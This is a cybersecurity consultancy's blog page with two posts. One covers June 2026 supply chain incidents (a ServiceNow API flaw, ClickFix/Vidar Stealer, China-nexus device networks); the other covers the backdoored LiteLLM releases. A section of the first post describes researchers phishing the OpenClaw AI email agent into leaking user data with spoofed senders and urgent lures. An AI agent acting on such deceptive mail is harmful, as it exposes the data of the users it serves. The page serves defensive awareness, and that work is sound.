TL;DR
Three major supply chain security incidents in June 2026 expose how attackers are pivoting from direct attacks to compromising the tools and vendors your business already trusts. ServiceNow's API flaw let attackers query customer data without authentication, a ClickFix campaign turned legitimate WordPress sites into malware delivery platforms targeting Australian infrastructure, and nation-state actors built covert networks of compromised devices to infiltrate organizations through their supply chains. If you are not actively auditing your vendor security posture this week, you are already behind.
The ServiceNow Breach: When Your SaaS Platform Opens the Door
ServiceNow, a platform used by over 8,000 enterprise customers including roughly 80% of Fortune 500 companies, disclosed a security incident in which attackers exploited an unauthenticated access flaw through a vulnerable API endpoint. The vulnerability allowed threat actors to query data directly from customer instances without needing valid credentials.
What happened: Attackers discovered and exploited an API endpoint that lacked proper authentication controls. Through this flaw, they could submit crafted queries to pull sensitive data from customer ServiceNow instances — including ticket details, employee information, internal processes, and potentially access credentials stored in knowledge base articles. The flaw was a textbook case of a broken access control vulnerability at the platform level.
How bad was it: The scope is significant because ServiceNow sits at the intersection of IT service management, HR workflows, and security operations for thousands of organizations. Any data stored in an affected instance — incident tickets, change management records, employee onboarding data — was potentially exposed. While ServiceNow has not publicly disclosed exact customer counts or financial impact, the average cost of a data breach in 2025 reached $4.88 million according to IBM's Cost of a Data Breach report, and platform-level breaches tend to compound that figure across multiple victims simultaneously.
How it could have been prevented: ServiceNow should have enforced stricter API authentication requirements, including mandatory token validation and rate limiting on query endpoints. On the customer side, businesses should have been limiting the types of data stored in shared platform instances and implementing their own monitoring for unusual API query patterns.
What to do this week: Audit every SaaS platform that holds sensitive business data. Demand that your vendors provide documentation of their API security testing, authentication enforcement policies, and incident response timelines. If a vendor cannot tell you how they test for unauthenticated access flaws, assume those flaws exist.
ClickFix and Vidar Stealer: When Trusted Websites Betray Your Users
The Australian Signals Directorate's Australian Cyber Security Centre (ASD ACSC) issued an advisory on a campaign using a social engineering technique called ClickFix to distribute Vidar Stealer through compromised WordPress websites, specifically targeting Australian infrastructure and organizations.
What happened: Threat actors compromised legitimate WordPress websites — sites that your employees might visit as part of normal business operations. These sites were then modified to display fake error messages or CAPTCHA prompts instructing visitors to "fix" a problem by copying and pasting a PowerShell command into their terminal. This is the ClickFix technique: it tricks users into executing malicious code themselves, bypassing many traditional security controls. The delivered payload was Vidar Stealer, a well-known information-stealing malware that harvests credentials, browser data, cryptocurrency wallets, and session tokens.
How bad was it: Vidar Stealer is particularly dangerous in a business context because it steals session cookies and saved browser credentials. An attacker with valid session tokens can bypass multi-factor authentication entirely. In previous campaigns, Vidar has been linked to secondary ransomware deployments. Organizations affected through compromised supply chain websites faced credential exposure, potential lateral movement, and the downstream cost of forced password resets, session revocations, and incident investigation — costs that easily reach tens of thousands of dollars per incident for mid-size businesses.
How it could have been prevented: Organizations should have been running web filtering and DNS-level blocking that identifies newly compromised sites. Endpoint detection and response (EDR) solutions tuned to flag PowerShell execution initiated from browser copy-paste actions would catch the ClickFix technique. User security awareness training specifically covering social engineering tactics that instruct users to run commands would reduce click-through rates.
What to do this week: Verify that your organization has web filtering active and that your EDR solution is configured to flag suspicious PowerShell execution. Run a quick awareness refresh with your team covering the ClickFix technique specifically — show them what the fake prompts look like. If any of your vendors or partners host WordPress sites that interact with your business, ask them what their patching and monitoring cadence looks like.
China-Nexus Covert Networks: Nation-State Supply Chain Infiltration
A joint advisory from the ASD ACSC and partner agencies outlined a significant shift in the tactics, techniques, and procedures used by China-nexus cyber actors to build covert networks of compromised devices, targeting organizations through their connected supply chains.
What happened: State-sponsored actors have been systematically compromising network devices — routers, VPN gateways, IoT sensors, and other infrastructure components — to build persistent covert networks. These compromised devices are then used as stepping stones to access the actual target organizations. The advisory highlights a shift toward exploiting supply chain relationships: instead of attacking a hardened target directly, actors compromise a less-defended vendor or partner in the target's supply chain and move laterally through trusted connections.
How bad was it: Nation-state supply chain compromises are among the most damaging incidents because they can persist undetected for months or years. The advisory indicates these actors are targeting critical infrastructure, government agencies, and large enterprises. The cost of discovering and remediating a nation-state-level compromise — including network rebuilds, credential resets across entire organizations, and regulatory reporting — can run into millions of dollars per victim. The broader economic impact of infrastructure disruption compounds this further.
How it could have been prevented: Network segmentation that limits what a compromised device can access. Zero-trust architecture that does not grant implicit trust based on network location. Regular firmware audits of all network-connected devices, especially those from smaller vendors who may not have robust security programs. Mandatory vulnerability disclosure and patching SLAs in vendor contracts.
What to do this week: Inventory every network device your business relies on — routers, switches, VPN appliances, IoT devices — and check each one against current vulnerability databases. Review which vendors have direct network connections to your environment and whether those connections are appropriately segmented. Add a clause to your vendor contracts requiring notification within 24 hours of any security incident that could affect your data.
ISO 27001 SMB Starter Pack — $147
Threat intelligence is one thing — having the policies and controls to respond is another. Get the complete ISO 27001 starter kit for SMBs.
Get the Starter Pack →The OpenClaw Warning: AI Agents Are the New Supply Chain Surface
In a finding that should alarm every business integrating AI tools, researchers demonstrated that the OpenClaw AI email agent fell for phishing attacks across multiple configuration profiles, leaking user data through tactics commonly used against human targets.
What happened: A phishing simulation targeting the OpenClaw AI agent showed that the tool was susceptible to standard social engineering techniques — deceptive links, spoofed sender addresses, and urgent language. The agent, designed to manage email on behalf of users, processed malicious messages and exposed user data that a human operator would likely have flagged as suspicious.
Why this matters for supply chain security: AI agents and copilots are rapidly being integrated into business workflows, often with broad access to email, documents, and internal systems. They represent a new class of supply chain risk: your vendor's AI agent now has access to your data, and if that agent can be phished, your data is exposed. As businesses rush to adopt AI-powered tools, the security of those tools themselves becomes a critical third-party risk factor.
What to do this week: Inventory every AI tool and agent that has access to your business data. For each one, determine what data it can access and what security testing the vendor has performed against social engineering and prompt injection attacks. If the vendor cannot demonstrate robust security testing, restrict the tool's access immediately.
FAQ
How do I assess which vendors pose the highest risk to my business? Rank your vendors by the sensitivity of data they can access and the directness of their network connection to your environment. A SaaS platform with access to HR data and a direct API integration is higher risk than a vendor who only receives encrypted file transfers. Focus your auditing efforts on the top 20% of vendors by data access.
What should I include in a vendor security questionnaire? At minimum, ask about: their most recent penetration test results and frequency of testing, their incident response plan and notification timelines, their employee security training program, their patching cadence for critical vulnerabilities, their use of multi-factor authentication internally, and whether they carry cybersecurity insurance. Ask for a SOC 2 Type II report if they handle sensitive data.
Is my business too small to be targeted through a supply chain attack? No. Supply chain attacks are opportunistic by nature. When attackers compromise a platform like ServiceNow, they are not selecting individual targets — they are grabbing data from every accessible instance. Small and mid-size businesses often have weaker security controls, making them easier secondary targets and attractive stepping stones to reach their larger partners or clients.
How often should I review my vendor security posture? At least annually for all vendors, and quarterly for any vendor with direct network access to your environment or access to regulated data (healthcare, financial, personally identifiable information). Any vendor that has experienced a public security incident should be reviewed immediately.
Conclusion
Supply chain attacks succeed because they exploit trust — trust in your SaaS platforms, trust in the websites your team visits, trust in your network equipment vendors, and now trust in the AI agents acting on your behalf. The incidents from just the past week demonstrate that this trust is being actively and systematically exploited by criminal and nation-state actors alike.
Your move is straightforward: stop assuming your vendors are secure and start verifying. This week, pick your three most critical third-party tools and demand security documentation. Inventory your internet-facing devices and check them against known vulnerabilities. Talk to your team about ClickFix-style social engineering. And if you have not mapped out every AI agent with access to your business data, do it now.
Visit consult.lil.business for a free cybersecurity assessment and find out where your supply chain vulnerabilities are before someone else does.
References
- ASD ACSC Advisory — ClickFix distributing Vidar Stealer via WordPress targeting Australian infrastructure
- ASD ACSC Advisory — Defending against China-nexus covert networks of compromised devices
- ServiceNow discloses security incident exposing customer data — BleepingComputer
- NIST SP 800-161 Rev. 1 — Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations
Work With Us
Ready to strengthen your security posture?
lilMONSTER assesses your risks, builds the tools, and stays with you after the engagement ends. No clipboard-and-leave consulting.
Book a Free Consultation →TL;DR
- Bad actors snuck harmful code into a popular AI tool called LiteLLM that thousands of businesses use [1].
- The attack stole passwords, secret keys, and digital wallets from anyone who installed the poisoned version [1].
- They did it by first compromising a security tool that LiteLLM trusted — like poisoning the water at the treatment plant [2].
- Here is what it means for your business and how to stay safe.
What Is LiteLLM?
Imagine you run a restaurant and instead of ordering from one food supplier, you want to compare prices from ten different ones. LiteLLM is like a universal ordering app that lets businesses talk to different AI services — ChatGPT, Claude, Gemini — all through one simple connection.
Thousands of companies use it to build AI features into their products [1].
What Went Wrong?
A group of hackers called TeamPCP figured out something clever. Instead of breaking into LiteLLM directly, they first broke into a security scanner called Trivy — a tool that LiteLLM used to check itself for bugs [2].
Think of it this way: imagine a locksmith who checks all the locks in your building gets compromised. Now the attacker does not need to pick any locks — they have the locksmith's master key.
Once inside, TeamPCP published two fake versions of LiteLLM (versions 1.82.7 and 1.82.8) to PyPI, the online store where developers download software [1]. Anyone who downloaded these versions unknowingly installed malware that:
- Collected passwords and secret keys stored on their computers [1]
- Spread to other computers on the same network [1]
- Set up a hidden door that let the hackers come back anytime they wanted [1]
Why Should You Care?
You might not use LiteLLM directly, but your business probably relies on software that works the same way — built from dozens of smaller pieces, each one downloaded from the internet.
According to security research firm Sonatype, attacks on these software building blocks increased by 156% in just one year [3]. And IBM found that when hackers steal login credentials this way, the average cleanup cost is $4.81 million [4].
The Australian Cyber Security Centre has flagged these kinds of attacks as one of the top threats businesses face today [5].
What Can You Do?
Ask your IT team or provider three questions:
"Do we pin our software to specific versions so updates do not happen automatically?" — This stops poisoned updates from sneaking in.
"Do we have tools that scan our software for known threats?" — Free and paid tools exist that check every package you download against a database of known attacks [6].
"If a tool we depend on gets compromised, how quickly would we know?" — The answer tells you whether your business would catch something like this in hours or months.
If you do not have an IT team: Start by keeping an inventory of the software your business uses. Know what you depend on. That awareness alone puts you ahead of most small businesses.
The Simple Takeaway
Every AI tool and every piece of software your business uses is built from smaller parts. If any of those parts gets poisoned, the whole thing becomes dangerous. The best protection is knowing what you depend on and having someone who watches for these threats.
It is like food safety — you trust your suppliers, but smart restaurants still check what arrives at the loading dock.
FAQ
Instead of attacking your business directly, hackers attack the tools or software your business depends on. When you update or install that trusted software, you unknowingly install the attacker's code too. It is like someone tampering with ingredients at a factory — every product made with those ingredients gets affected.
If anyone in your organisation uses Python and has LiteLLM installed, check the version number. Versions 1.82.7 and 1.82.8 were the compromised ones. Run pip list | grep litellm to check. If you see those versions, contact an IT professional immediately.
Very common and growing fast. Sonatype tracked a 156% increase in software supply chain attacks in 2025 [3]. The LiteLLM incident is the fifth software ecosystem TeamPCP has targeted, showing these attackers are becoming more ambitious [2].
No. AI tools can genuinely help your business work smarter and save money. The key is using them with proper safeguards — verified versions, dependency scanning, and regular security reviews. Think of it like driving: cars are useful, but you still wear a seatbelt.
References
[1] Endor Labs, "TeamPCP Isn't Done — LiteLLM Supply Chain Attack Analysis," Endor Labs Research, Mar. 24, 2026. [Online]. Available: https://www.endorlabs.com/learn/teampcp-isnt-done
[2] R. Lakshmanan, "TeamPCP Backdoors LiteLLM Versions 1.82.7–1.82.8 Likely via Trivy CI/CD Compromise," The Hacker News, Mar. 24, 2026. [Online]. Available: https://thehackernews.com/2026/03/teampcp-backdoors-litellm-versions.html
[3] Sonatype, "2025 State of the Software Supply Chain Report," Sonatype, 2025. [Online]. Available: https://www.sonatype.com/state-of-the-software-supply-chain
[4] IBM Security, "Cost of a Data Breach Report 2025," IBM, 2025. [Online]. Available: https://www.ibm.com/reports/data-breach
[5] Australian Cyber Security Centre, "Annual Cyber Threat Report 2024-2025," Australian Signals Directorate, 2025. [Online]. Available: https://www.cyber.gov.au/about-us/reports-and-statistics/annual-cyber-threat-report
[6] Socket Security, "TeamPCP Targeting Security Tools Across OSS Ecosystem," Socket Blog, Mar. 2026. [Online]. Available: https://socket.dev/blog/teampcp-targeting-security-tools-across-oss-ecosystem
[7] JFrog, "LiteLLM Compromised by TeamPCP — Supply Chain Attack Analysis," JFrog Security Research, Mar. 24, 2026. [Online]. Available: https://research.jfrog.com/post/litellm-compromised-teampcp/
[8] McKinsey & Company, "The State of AI in 2025," McKinsey Global Institute, 2025. [Online]. Available: https://www.mckinsey.com/capabilities/quantumblack/our-insights/the-state-of-ai
Wondering if your business software is safe? Talk to lilMONSTER — we help businesses understand their technology risks in plain language.
